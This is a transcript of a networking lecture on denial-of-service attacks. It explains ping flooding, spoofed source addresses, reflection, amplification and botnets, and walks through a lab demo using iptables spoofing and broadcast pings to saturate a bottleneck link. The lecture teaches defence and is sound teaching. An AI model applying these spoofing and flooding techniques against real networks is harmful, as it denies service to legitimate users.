 We're looking at how a malicious user can overload some target to deny the normal users access to that target Okay, so we've started going through some scenarios We are looking at a simple pin flooding attack where there's some target computer where the malicious user wants to stop people accessing that target computer so the idea is that on One of the links leading to that target Especially the slowest link or what we say the bottleneck link try and send enough packets Such that the capacity of that link is utilized fully utilized. So that link has some Capacity that is the data rate that it supports if we send enough traffic into this link and Use up that entire capacity then the data from the normal users will not be able to pass through that link or at least Could be delayed a lot. Okay, so This depends upon a bottleneck link being leading up to the target And with the pin flooding attack we use pin Which is a simple application that the source sends an ICMP echo request To some destination computer and the normal behavior is that that destination replies with an ICMP echo reply So the protocol used is ICMP. There's a request and a reply That's the normal behavior of ping. So the idea of the attacker is to send many of these ping requests to the target Not worrying about the replies. We don't care about the replies What we want to do is just send many pin requests to the target such that we overflow this link We fill up the capacity Why use ping? well the idea is to be able to send data to some target and Such that and we'll see later when we reflect off others such that That the one that we're sending to will actually respond or that the data will get to that target We'll have a look and see well. Why not use a Web browsing or sending to a website why not use other protocols so we'll look at What's the benefit of using pin when we look at the different attacks? But the general idea send us enough data to overflow the link and we got to a point of some variations well one thing is to When we send our data Use a fake source address different different purposes of using a fake source address one is to hide So one way to stop or to recover from a denial of service attack is to find out who is doing the attack and take some action Against them the action may be blocking The data that are sending somewhere or maybe some legal action If this is an attack on some company then that company can take some legal action to try and Stop it happening in the happening in the future. So if the attacker can try and hide themselves Then that makes stopping the attack in the future harder. So sending messages with a fake source address is one way to hide but we'll also use a fake source address or spoofed source address to Facilitate facilitate the attack to make the attack More powerful And how do we do that? We'll go we'll skip back to some slides where necessary This was an example where the attacker Sends the ping messages Sets the fake source address such that a the target doesn't know where they come from so to hide and Bees such that the traffic doesn't all come back to the attacker and overflow the attackers link Okay, so it goes to others. So that was using a fake source address So the attacker sends a message the target receives and replies to others But we'll move to a more powerful attack in that Send the message to normal computers on the internet So it's just some other random computers on the internet with a fake source address Where the source is that of the target? So this we send a ping echo request to this computer this one receives it and This one looks okay I just received a message and the source address was from the target IP address therefore, I will send a reply to the source so I'll send a reply to the target and The attacker sends similar pings with this fake source address set to the target to many computers on the internet and They all reply with the ping reply to the target So this is we were we are reflecting the pings of these normal hosts in the internet And this is a typical form of a denial of surface attack Now from the target's perspective Doesn't know that it is under attack Well in the previous Case From the target's perspective. It's receiving pings from multiple different source addresses Because they have a fake source address So it's hard to tell that it's under attack because it's receiving pings from many different computers and The same in this case. It's receiving pings from different computers and in fact The ISP of their target is receiving the pings from many different locations different Paths across the internet. So it's quite hard to tell whether this is just normal users sending traffic or If it's the attack of course, we can scale up and in this example, we just use three but use 303,000 thousands of nodes across the internet to and to increase the magnitude of the data that comes into the target So we bounce messages off normal hosts Now let's look at the applications that can do this before we look at a more detailed example For this to work this reflector attack What do we need? We need these normal computers to be able to To respond to the message that they receive Now first these normal computers are not infected in any way so we They don't necessarily have any virus or any militia software on them So they're not under control of the attacker. They're just normal computers on the internet okay so Yet we need a protocol Such that if we send a message to these normal computers they will respond Now that limits the set of protocols that we can use in such an attack if we were using say HTTP get requests We're trying to use web browsing as the protocol here from the attackers perspective if they send a message to a web server Then how many normal computers in the internet run web servers? Not many but most Normal computers in the in the internet respond to ping requests Because it's a typical behavior of a computer that built into the operating system If you receive a ping request you send a ping reply most computers do that But not many computers run web service so That's why we use ping here because most normal computers use will respond The attacker sends a message to them. They receive a message so they respond now. We're I'm meeting information that we're going to cover later about firewalls and so on we're assuming that they can be reached so Ping is very easy to use because most people most computers will respond to it Whereas other applications web browsing Emails and so on not all computers will respond to an unsolicited message that they receive Remember the goal is to overflow the capacity of the link to the target So that the normal traffic doesn't get to the target How do we do that? Send to many different normal hosts so they all reflect to the target So the more hosts the attacker sends to the more is going to go to the target. So send to more Hosts in the internet That's how you increase the traffic to the target or the end or the other way is to get These hosts to send a lot of data to the target It's all about getting as many bits per second to the target as possible How do we do that? get more messages going to the target and or get those messages to be larger and some real attacks in the internet denial of service attacks try and take advantage of the fact that some protocols The response will be larger than the request That's what I'm trying to show in this diagram And it's not necessarily with ping it doesn't work well with ping because in ping the request and the reply Are about the same size but in some protocols the request is small Let's say 50 bytes But the reply is large Say 500 bytes DNS is an example And there are a few other examples here The idea is that the attacker again sends a small request to these normal hosts on the internet these normal hosts reply and Again, we're using a fake source address. So they all reply to the target But the idea is that the reply will be larger than the request therefore increasing the amount of bytes that go to the target and Making it easier for the attacker because the attackers network doesn't need to be so Have so much capacity if you note If the request and the reply are the same size Let's say the capacity of the link that we want to overload is one gigabit per second Then the attacker needs a link here that supports at least one gigabit per second because the attacker needs to send out at one gigabit per second Such that these will send in at one gigabit per second but if the reply is larger than the request Then to send at one gigabit per second in we don't have to send necessarily at one gigabit per second out because we send it a small rate out small messages but the These hosts that receive the request effectively amplify the data that's sent to the target and This is called an amplification attack Or the concept is amplification. We amplify the amount of data going to the target and That's common in in real denial of service attacks Questions, so we just quickly look at some of the concepts then go through a demo to see them work and then return to a summary Questions so far To download some data now remember for when we're using these when we're bouncing off these normal hosts For this to work these normal hosts must respond to the data to the packet that they receive now if Let's say my computer in the office is one of these normal hosts And the attacker is trying to use it to bounce off my computer and go to the target some web server okay Then for this to work my computer in the office this one must respond to the request that it receives now and Similar with all computers on the internet like all Normal computers. What do they normally respond to? Well, they usually respond to pings That's why pings a common protocol here. That is most computers will when they receive a ping request will respond But if someone tries to get my computer to download some other file to access some website. Well, that's not so common That is to send a request and get mine to reply you need My computer to be able to respond to that request So there are only some protocols that it will do that to so Unless my computer is a web server if my computer was a web server and This sent a request for a web page and then mine sent the web page in the response to the target Then that would work But there's another problem with that approach is that web browsing The speed at which you send the response is usually not under control of The the attacker and it's because of the transport protocol use with TCP Even though we may send many requests to the web server The web server will not send the metafar speed to the target It will actually slow down depending upon the amount of capacity here So it turns out that the protocols that we can use for such an attack need two characteristics they need these normal hosts to be able to respond and Second usually they need to be using transport protocols, which are not TCP TCP has characteristics that it will slow down automatically if The capacity starts to get overloaded here So protocols that use TCP are typically not used in such an attack because if we use TCP and We were sending fast and this was trying to send fast to the target TCP has built-in flow control mechanisms To slow down the sending rate if the capacity becomes full You've studied flow control with me last semester Remember the idea make sure that the source doesn't send too fast to overflow the target So TCP has such mechanisms so that it's not very useful for such an attack because if we start sending too fast to the target The source will automatically slow down So the protocols that are successful in these attacks are ones which don't use TCP So therefore they use either ICMP like ping or they use UDP DNS for example uses UDP some network management protocols use UDP and They need to be able to The protocol or the application needs to be work such that normal hosts on the internet will respond Ping is one, but there are a few others as well Another form of amplification attack in this case We send let's come back to ping we send one ping message To this one and the attacker sends a ping request to another one and to another one So let's say it sends three ping requests in parallel But we have a feature of broadcast in the internet We can send one message to a particular network And if we use a special destination address that message will be delivered to all hosts on that network That's broadcast. So broadcast is this feature that you send one So there's one from the source, but the message is delivered to all in some set in some network if we can take advantage of that then the attack can be even more successful and The concept is and again, it's more amplification the attacker Let's focus here Sends one ping request Not to a particular Host on the internet But to a special broadcast address which really refers to all hosts on a particular subnet and The way that this in theory works is that when you send a ping request to this special broadcast address That one message is delivered to that subnet and then the subnet delivers it to all the hosts on there and Therefore all hosts on this subnet receive the request and then all of them reply to the fake Source, which is the target and we just send another ping to another subnet That's messages delivered to all hosts on that subnet and then they all reply to the target So this is a gain amplification in that The attacker is sending just three messages But what comes to the target is Multiplied based upon the number of hosts in each subnet That's the idea here. That only works in very special cases They're usually some built-in mechanisms that will stop that from working, but let's have a look and see How we can do it on our small virtual network and we'll see this one and see some of the other Forms of attack so last lecture. We gave a quick demo and we'll continue with that and again I'm using a virtual network and I've added some more annotations here. There are eight nodes in our small network our small internet We have a target server. This is the one we want to overload Overload in terms of we don't want others to be able to access it Let's say it's a web server has a website and we want to stop other users from accessing that website or at least slow down their response time So when they try and access it takes a long time to get a response. That's our aim as the attacker this is our This is the target server computer a computer seven node seven is a router. So this is a forget about the The rectangle net C. This is just a switch. So think of this as the link between router and target and This is our bottleneck link in this example That is we assume this link is the slowest in the whole internet and that's the one we're trying to overload Remember, we're not trying to overload the actual computer. We're trying to overload the link Send fast enough such that this link is fully utilized And I'm going to set this link to have a capacity of a hundred kilobits per second Now that's unrealistic in a real network will be much larger than that But just for our demo when we only have a few nodes Oh artificially limit the capacity of this link from seven to eight to 100 kilobits per second So anything that node seven receives that is destined to eight The speed or the data rate which you can send to eight is 100 kilobits per second So our denial of service attack really needs to be able to send in at a rate larger than 100 kilobits per second If we send in to seven at 50 kilobits per second then the link will not be fully utilized and Other normal users traffic will get to node eight, but if we send in to node seven at say 200 kilobits per second Then seven will be sending out at the maximum 100 kilobits per second and the data from other users Will either be delayed or dropped in being sent to node eight. So this is our bottleneck The 100 kilobits per second is just chosen so I can demonstrate it with a few nodes We'll see the effect in a moment Some reflector nodes. We're gonna these are normal nodes. They're not infected They're just normal nodes on the internet and because we're using ping they will respond to pings They'll receive a ping and send a response to the source Node three will also be a reflector, but in some demos will will make it also Act as a web browser that is the normal host that wants to access computer eight Just to demonstrate in fact in the first demo will use node three as the malicious user Later will set this as a router and another malicious user, but let's for now for the first demo forget about one or two Let's say we just have this subnet and the target eight. We're going to use broadcast the idea is Node three is the malicious user For this first case It's going to send a ping request to a broadcast address Instead of sending individually to four five and six So instead of sending three packets It will send one packet to the special broadcast address and this switch will take the role of taking that one packet noticing the destination is broadcast and therefore send to everyone on the subnet and Then those that receive that broadcast will then reply to the target That's our first attack so web browser or node three is the malicious one just in this demo so Not node one. What have we got node three is our malicious node Node eight as our target node seven is this router Actually, we don't want node eight. We want what I want to show is that node three will send packets nodes four five and six At least should receive and then send to the target. So let's look we're going to look at What node three does to initiate the attack? We'll look at maybe let's say node five and see what it receives We will not look at what the target does what we'll do is we'll look at the data coming into node seven and How much goes out? Remember the capacity here is 100 kilobits per second. We want to send enough data into seven Such that the amount coming out reaches 100 kilobits per second. We want to fill up the capacity So let's look at three five and seven for example So I need to log in to node five Which is node five has IP address 192 1682 dot 23. Let's just Set this up first We need to set a fake source address on node three What source address? So we're going to use a fake source address on node three. What's the source address? Which nodes address? Eight okay, so the idea again is to send a message a ping to The nodes in this network and they will all reply to eight. So the source address needs to be that of eight and The way to do it in this case. I Need to remember Maybe I have to type it IP tables is just the firewall software have to remember what to type and It allows us to change addresses of the packets that we generate So normally we create a packet and the source address will be node threes address But IP tables will allow Node three to change the source address You don't need to understand the details of how that works right now Post routing means after we create it anything that's ICMP Let's use some Network address translation, and this is the main part set the source address to and it's wrapping around now 192 168 dot 3 dot 31 No Let's try. I need a password. Did I get it correct? Okay? No errors So this is just the way to set the the fake source address It'd be a bit easier to see We'll see that work in a moment Let's just do a simple ping to just one node So I'm going to ping just for start a Single ping to node five and five will Respond to eight. Let's just see that work and let's just make this so we can see and on node five What I'll do is just down the bottom is run TCP dump if it's too small We'll eventually make sense of it run TCP dump so we can see from node five Perspective the packets coming in and out I'll zoom in in a moment and now let's start our ping and With ping we can set the interval of the ping Let's say two per second Two packets per second, which is an interval of between the pings that we send of zero point five seconds so every point five seconds node three is going to send an echo request and Let's set the size of the request to 972 bytes This magic number comes from the fact that when we add on headers The total size will be 1,000 bytes just to give a nice round number and ping who? ping which address node three pings node five Okay, just it for this first demo that is Send a ping message to here. This one should reply to here Node five is two dot twenty three Zoom in a little bit Okay, we're doing a ping and even if you can't read the details. This is node five down the bottom Every ping request it receives Will stop it? It receives a message the way to read this ICMP echo requests from three dot thirty one to two dot twenty three and Therefore the echo reply Goes from node five two dot twenty three to three dot thirty one and three dot thirty one is our target So this is the the reflection Happening are we overflowing did we overflow the target? No. Yes. Maybe. How do you know? check Let's calculate in this case the Let's say every packet is a thousand bytes Okay, the ping request and reply are a thousand bytes or approximately Okay, we see that's why I set to 972 so one packet is a thousand bytes in length in this case We were pinging from node three to node five at a rate of two packets per second Two packets per second it sends to node five and Therefore node five will send to the target at a rate of two packets per second Node five receives two pings per second. It replies with two pings per second So how much data is being sent to the target? If we're sending two pings per second Each ping is a thousand bytes. That's two thousand bytes per second being sent to the target 2,000 bytes is 16,000 bits per second Okay, bytes to bits That is the amount of the amount of data going to the target is 16 kilobits per second But our capacity of the link here is a hundred kilobits per second 16 should be no problem It's not overflowing the capacity Rather than having to calculate that all the time. Let's look on node seven and Let's monitor what we receive and there's another program. We'll use is called IP trap to measure the traffic on node seven It provides a simple graphical interface To monitor what comes in and out of this computer And I'll just look There are many different statistics. We'll look at the general interface statistics. We'll see why For node seven There are four interfaces loop back not important Ethernet zero is Just for this node to access the real internet. We're not going to use that Ethernet one and two are the interfaces of interest. This is node seven Ethernet one ETH one this interface it's going to receive packets and Sorry, there's a mistake in this picture. This should be ETH two here This should be ETH two ETH two is where it's sending to node eight. So think of input to ETH one output to ETH two So we this is a two here So this software will report for ETH one and two how many kilobits per second ETH one coming in ETH two going out. Let's do our ping again And just check so it's pinging What do we get? 20 kilobits per second coming in and out 27 it calculates every few seconds and keeps the average over some period of time What do we say one ping would be 16 kilobits per second? Okay there are What are there? There may be some overheads in Either in ARP happening What else can the overhead be the packet lengths I can't think of any other overhead so 16 kilobits per second is based upon our 1000 byte ping packet But we have a little bit more in this case It's a little bit more than I expected but close enough to 16. Let's see Remember, we need to get this up to 100 kilobits per second ETH two It can only send out at 100 kilobits per second so far. We don't have enough. Let's Now try a better attack Before we pinged to a specific node Now let's ping to the special broadcast address 192 1682.255 is a special address which means send this message to everyone on this subnet That is node 3 sends this message It sends across the link to the switch the switch sees it's a special broadcast address this 255 address and then realizes okay, I need to send a copy to everyone and It will send a copy to everyone on this subnet three four five six two and seven They all receive a copy because they're on this subnet and they They will reply and reply to the target Let's try it The reason I just realized why it was at 25 is because we're logged in to node 5. I Think I'll log out. Let's hope it works this time Let the ping do you want a ping to broadcast ping normally doesn't let you okay? Why because it's commonly used for denial of service attacks. Well Pseudo Sorry, I forgot to include the minus B option. Let's do it without Pseudo Minus B means broadcast and Now it doesn't let me again. Now. I'll use Pseudo warning now I'm Node 3 is sending a ping to this special broadcast address We note node 5 is receiving it You can see it's the request is being received and it's replying How much traffic is going through node 7? Eth 1 coming in to node 7 is 80 kilobits per second Coming out of node 7 to node 8 on eth 2 is 64 kilobits per second What's happening here anyone want to guess? That's right down the calculations to see Again, what do we say? We said that at two packets per second two pings per second each ping was 1,000 bytes means that For one ping being sent there is 2,000 bytes or 16 kilobits per second 16,000 bits every second for one thing what's happening in this case is that node 3 is Sending a ping to the broadcast address it goes to the switch the switch realizes This message is destined to everyone on the subnet and Note the switch realizes that the source is 3.31 So it sends to everyone is it makes a copy and sends to everyone on the on the subnet including four seven six Five and two and three in this case it actually sends back to three Because the source address is not that of three it actually sends back to three So this is the broadcast send one everyone receives now When node five receives what does it do? It receives a ping request it replies And who does it reply to the source and the source was that of the target? So node five replies It'll go to node seven which will then send it on to node eight because node seven is the router It will send the ping reply, which then should send it to eight Node six will do the same it replies Node four the same Actually node three does as well three receive the request three Sends on In this case the way that node two is set up as a router It's configured that it will not reply to such ping record requests to a ping to a broadcast address The operating system is set up so that the router will not reply That's the actually a security feature of the operating system to not reply to those ping requests We'll return to see why that's the case later, but two doesn't reply in this case Similar seven is a router. It will not reply so What's coming into node seven? Look at the lines. There are four blue lines and one red line. So each ping Generates 16 kilobits per second So the the red line is coming into seven at 16 kilobits per second the requests The replies from six another 16 kilobits per second. That's 32 coming in The replies from five That's 48 if we add that replies from four that's 64 kilobits per second and the replies from three That's 80 kilobits per second coming in 80 coming in to node seven on ETH one on node seven we have 80 kilobits per second What comes out? Actually, all those blue ones should come out. They're the replies The red one is the request going to node seven and because node seven is a router it would not Respond so it doesn't send anything out to node eight. Why is it coming out here because the source address was that of node eight? So there are how many kilobits per second going from seven to eight? How many kilobits per second on ETH two which is out of node seven? 64 kilobits per second That's what we expect. Is that what we see? Yes Okay, so the demo is working in this one coming in to node seven at a speed of 80 kilobits per second Because there's also requests coming in and coming out at 64 kilobits per second We care about the coming out really 64 kilobits per second capacity 100 We haven't reached our capacity yet. How are we going to reach the capacity? How do we increase the amount that seven sends out to eight again? put on your Black hats What are you going to do to make the attack more effective? again more More pings We were sending it to per second That is every half a second just reduce the interval Let's send that what what do you want to send it? How many per second 10? What's the minimum that you need? Well, remember with four nodes sending we don't have any more nodes, so we can't increase the number of nodes We're going to have four sending We need to reach 100 kilobits per second. So each of them should be sending at 25 kilobits per second How do we achieve that? Well, all right let's try What five pings per second Would be 5,000 bytes per second Which would be Sorry, yes, 5,000 bytes per second would be 40 kilobits per second Five pings per second would be 40 kilobits per second times by four would be 160 kilobits per second coming in Let's try it five per second. That is the interval is 0.2 Okay, five pings per second Send to the broadcast address all right just on node five. It's receiving should be five per second What about node seven? ETH one is coming in to node seven Remember each one sending at 40 kilobits per second. We actually have five coming in Around 200 kilobits per second coming in But coming out from node seven to node eight look at the amount being sent out Because the capacity of the link is 100 kilobits per second it cannot send any faster out and Our attack is successful Well, at least we overflowed the link because The output link ETH two from seven to eight. We're sending at 100 kilobits per second approximately That is the pings From node from node seven to eight We've generated and pings to fill up the bottleneck link of 100 kilobits per second and that's our aim for the attack Very easy in this case just ping to the broadcast address and everyone responds to the target Questions on how that one worked What if my capacity of this link was a megabit per second? What would you do? Or how do you fill up and utilize that capacity? What what do you need to if the the bottleneck link is has a higher capacity? What do you need from the attackers perspective? Send send faster. Okay, send at a higher rate So instead of two pings five pings per second 500 pings per second note that That requires some capacity from the the source node the attackers perspective So yes, we can send very fast, but that starts to use up the attackers own resources So yes, we can increase the sending rate What else would enable a an attack on the higher bottleneck link? Yeah Change the protocol. Okay. How I mean what what would the new protocol characteristics have? like DNS because Okay, if we had a protocol such that we send a small request Everyone receives that request and Then they reply but the reply is much bigger than the request Make the reply large more bites link Increase the amount of data going to eight. So yes a different protocol may enable us to do this amplification by sending small requests and Requires just a small amount of resources from node three But generates large replies which again overflows Different protocol would enable that if we're stuck with ping. What do we need? What else? Not in this network in general Increase the number of nodes if we had a larger subnet Okay, we just send one ping It goes to everyone on the subnet So let's say the subnet was say for the sit one of the labs Then there are 40 computers in the lab you send one ping all 40 computers reply and Go to the target. So it's quite easy in fact in that case to Send one message and get many to reply Using the broadcast feature. Let's stop this now Unfortunately for the attacker Using this feature of broadcast normally doesn't work in practice Why? Because it's so easy to do a denial of service attack send one message Everyone in the network replies Most computer systems most operating systems and network devices Block such a feature They don't respond to a ping to the broadcast address So To set up this demo. I had to modify my operating system parameters such that it would reply by default these computers normally will not reply to such a ping request because Denial of service attacks are very easy if they do so normally routers will not allow a Ping to a broadcast address So this one will not send it out and Similar if it did send out these ones normally will not reply to such a ping request So in theory, it's very easy to do an attack But because of that in practice most devices will not let the broadcast message go out so routers block the these broadcast packets and that's that happens in most cases and In our demo in fact, I had to modify Three four five and six such that they would reply to the ping request That was to a broadcast address. I could do that note that two and seven didn't reply. They were routers I I don't have a way to modify the operating system to allow them to reply It's it's built in the operating system don't respond to them. So that's a countermeasure So broadcast is a nice idea, but doesn't work much in practice okay But what we can do is still instead of using broadcast. I can still Ping four ping five and ping six and they will reply Let's do that But let's do it now and let's set node one to our malicious Coming back to broadcast We did broadcast from node three to its subnet It would be better if node one could send one Broadcast message to this subnet Again in theory it's possible To send one ping The destination is two dot two five five. It will go to all of these and all of these reply If that was possible someone out on the internet could send a ping message to The broadcast address for SIT every computer in SIT would then reply to the target If that was possible that a denial of service attack would be very easy Therefore most devices do not allow such a message to pass through so if if I tried that Send a ping to the broadcast this one would block it say no you can't do that so That's why I had to do it from node three just for this demo Let's then get node one to Individually ping three ping four ping five and six in Parallel and all of them reply to eight. Let's go back node three is no longer our malicious node node one is Node one is out going to be our malicious node now for node three. We need to remove this This fake source address. It's back to a normal node Delete this face fake source address and node three We won't need node three at the moment. We need node one And let's give it a fake source address same as before and again to the address of the target same as before So node three is going to send packets and it needs to send packets to Three four five and six at the same time. So what you do is you just run ping in the normal mode ping node three and then At the same time ping node four and five and six so to do that actually you need to open up four different terminals You can do it, but I to make it a little bit easier. I created a script that would do it automatically for us So I created something called ping many and It will ping as many nodes as I as I list It takes From memory it takes The parameters of the interval and the size. So let's use our same interval as before Size as we used in the previous and then we just set the destination addresses. So we want to ping 2.21, 22, 23 and 24 ping many nodes at once And It runs and it runs in the background So we don't see any feedback, but we can see on node seven. Is it working? node seven again We're pinging four nodes three four five and six and they're all replying to the target Therefore coming into the router node seven on eth one is four times We're doing two pings per second four times 16 kilobits per second 64 and coming out around 64 kilobits per second Now we need more we need to get up to 100. So as we did before we just increase increase stop them and increase the the rate Reduce the interval Now those four pings are running in the background. So I need to stop them and This is not so important, but I can kill them interrupt those ping processes if you don't understand this bit, that's okay stop the pings and Okay, we're back to zero. So nothing's being sent now Remember we're trying to stop normal users from accessing server eight That's our aim. We want to overflow our link so that no one else can access eight So what I'm going to do is open a web browser on node three I've set up a small website on computer eight and I'm going to visit the website and Then we'll see when we do the ping how the response time is for visiting the website now Our nodes only have a command line. So I had to do some special setup to give a firefox access and I've set up firefox so I can access the website on node eight I've created a website on 192 1683 dot 31. Let's try. It's a great website Just has a few links to some different pages. Okay, so this is No, think of this is the browser on node three it actually is using node three and sending to the Target eight, which is 192 1683 dot 31. So this is the website on the target How's the response time? Click on a link. No worries. Okay, it's it's very fast Loads an image. Okay Go back now let's start our attack, but we have a different interval and An interval of 0.2 means five packets per second Five times a thousand bytes is five thousand bytes per second 40 kilobits per second from one node, but we're pinging four nodes. So those four should respond generating a 160 kilobits per second four times 40 and Our capacity is 100. We're sending at 160. So we should overload the link Let's try it. There's check Is it working? Why is it slow? There we go Coming in at around 160 Going out the capacity of 100 Let's see on our browser now on node three The response I'll re reload Note up here. It's loading the page It's not responding very fast at least Let's try something else. Let's try to a link to page two connecting Node three trying to browse to the target web server is getting no response So the denial of service is working in this case. We're denied access to that website It may connect or it may so why is it not connecting? So Waiting down here What's happening? We've got many ping packets coming into node 7 and It's sending out as fast as possible 100 kilobits per second and then node 3 Tries to set up a TCP connection. So it sends a packet to node 7 But that packet has to wait for all those pings to be sent to node 8 So there's a large delay at node 7 There are many packets coming in only some of them going out the others are waiting in the queue to be sent Including the one from node 3 has to wait in the queue for a long time Now maybe it gets sent and The response comes back slowly and then the request goes or in the worst case It gets here and has to wait so long that eventually it's dropped. It doesn't get sent at all So that the request from 3 to 8 doesn't get there or the response doesn't get back We got to page 2 eventually so it did load there If we Try page 6 again, you see the response time is very very poor in this case It's trying to send its packets to node 8, but all the ping packets are going to node 8 What if we Stop that one and just modify a little bit Let's say Two and a half packets per second. So in this case around this right So again around 100 kilobits per second coming in 100 coming out Now we can There's a there may be a little bit of delay. It's hard to notice But again the capacity is may not be fully utilized. So our packets Passing through so we must from the attackers perspective. We must generate enough traffic such that the normal users traffic is delayed a long time and even eventually dropped and To do that we just need to fill up that link fill up the capacity So that was around 80 kilobits per second questions Okay, so what how do we fix this? How do we stop such an attack? There are different ways Yes, one thing that node 7 could do is that it's receiving many pings coming in So one thing that node 7 could be set up to say okay My capacity is here is 100 kilobits per second If I receive pings at a larger rate Don't try and send them drop them immediately So that the web traffic can get through so give priority to some Web browsing traffic going across this link compared to other traffic the ping traffic So yes, you could set up nodes 7 to try and drop the ping packets Let's look at the other issues Just come back to our slides and see Okay, so we've gone through I think We didn't demonstrate this attack this requires a protocol that will send a bigger reply than the request ping doesn't Protocols that do include DNS SNMP for network management a few other Security protocols and network protocols network time protocol that synchronizes your clock on your computer does Correct for DNS to work these hosts on the internet can't be normal hosts. They need to be DNS servers So for a real attack to work you need many DNS servers on the internet attack But there are a lot that will respond and there are real attacks that use that so it's not so simple that you We can use any Computer on the internet, but remember there are what hundreds of millions if not billions of devices on the internet You just need some of them to respond Thousands maybe a small fraction Sending to a broadcast address Works real well in theory Because you send one many people reply but in practice most devices block such packets So it's not real useful in practice today Everything up until now these devices were not infected That is they were just normal computers on the internet therefore. It's quite easy to find computers to send by But the next form is that the attacker Gets some malicious software on some computers in the internet. Maybe many people have some virus that the attacker has Programmed and that virus Initiates an attack So the attacker takes control of computers on the internet. We call them zombies Where a collection of zombies is referred to as a botnet? its network of bots and Gets those zombies to initiate the attack the zombies ping other computers on the internet and They reply to the target What does the attacker need to do and what resources does the attackers network need? Well, all it needs to do is control the zombies send a special message to the zombie saying Start your attack on this target It doesn't send the ping messages It just sends one simple control message to the zombies saying start to ping this target And then they start pinging random addresses usually in the internet and if you ping thousands some will reply and overflow the target So a botnet Contains many computers under the control of the attacker which the attacker uses to initiate the attack on some target And there's talk of botnets in the order of millions of computers in size that some organizations have software on a million different computers and They effectively rent that out to malicious people So a malicious user goes to someone who has a botnet and they say we'll pay you this amount per Per hour to use your botnet to attack a particular target. How do you stop that? Well in practice, it's quite hard it comes back to making sure or limiting the the chance of Someone taking over at the computer that's important. So making sure that malicious software cannot be installed on these computers antivirus and so on and once Discovered there are some techniques to try and redirect the traffic. So if an attack starts then The internet service providers can try and block the traffic before it gets to the target But many real denial of service attacks use this approach And again from the attacker's perspective, they are hidden even further Because tracing back the target traces these normal hosts then going back Traces back to the zombies and then from there you need to trace back to the attacker So finding the attacker is even harder. In that case the attacker needs to build this botnet construct the attack network They must get many slaves under their control It's many computers. So they need to infect those computers with some malicious software called some zombie software So the general process is that they create some software that will do the attack Do the ping? It should run on different systems different types of computers so you can spread it across as many computers computers as possible It should be hidden so that the normal user doesn't notice it So the person sitting at this computer doesn't know that their computer is doing something malicious and It should be able to be contacted by the attacker So the attacker so that the malicious software sits there until the attacker sends some trigger saying start the attack Usually that then involves taking advantage of some vulnerability in in that Computer to get the zombie software installed on that and then once you have zombie software on there Then you need to write to do that You need to find machines that you can install the zombie software on so scan for machines infect them and Then the zombie software automatically searches for other computers to infect so we can have it at different levels so It's not just Infect these three computers, but then they automatically try and find other computers to infect and you Get larger and larger and that's how botnets of say millions of computers are created To to close how do we stop all these attacks and we're at what's called distributed denial of service attacks a Normal denial of service attack think there's one computer doing the attack But in fact for practice we have many computers doing the attack Yet they are distributed across the internet. So a DDOS Distributed denial of service attack How do you prevent them? Have enough Resources such that if an attack takes place that you can quickly allocate resources network resources Server resources So that if the load increases that you can quickly adapt to that But that's costly Detect so if an attack takes place you want to detect it as quickly as possible So you can respond in some way respond, how do you respond? Identify who the attackers are Try and take some action either block the packets from that attacker But that more comes to okay contact in the internet service provider and getting their internet service provider to block those computers Or even take legal actions to stop them It's usually hard to prevent a current attack, but you may prevent future attacks So deny the service attacks try to prevent normal users from using the network the system the computer system applications on those systems You with the exhaust CPU on the computer or memory or disk or bandwidth in a network for example capacity Often address spoofing or using a fake address is used to hide the attacker and to redirect traffic Often we reflect packets off normal hosts Amplify the amount of data going to the target by using protocols that send small requests and large responses use other Computers under your control that are infected with some software to initiate attacks Generally quite easy to perform We did it quite easily on a virtual network Hard to prevent but easy to detect But often detection is too late because if your Amazon and the attack even goes for one hour Before you detect or before you can respond then that's one hour of lost money lost income So that's still a significant problem in the in the internet Have a look at some of the other areas to explore We will not cover through them if you're interested further Any final questions on denial of service attacks? We've gone through demos of just some very simple ones, but show the main concepts used by most try If you like the attack the demo that I did you may be able to modify you may be able to even do Attacks with different protocols. I think you could try DNS or NTP to do it even a more advanced attack But of course if you try anything just do it in the virtual network never do it in a real network It's very easy to do it The instructions for everything I did link to from the course website Okay, so you can read everything that I did there all those commands so you can copy and do it yourself You can read through all the commands and this is linked to from the course website the steps for creating the network and the commands for Setting up the nodes and for example the commands for doing the fake source address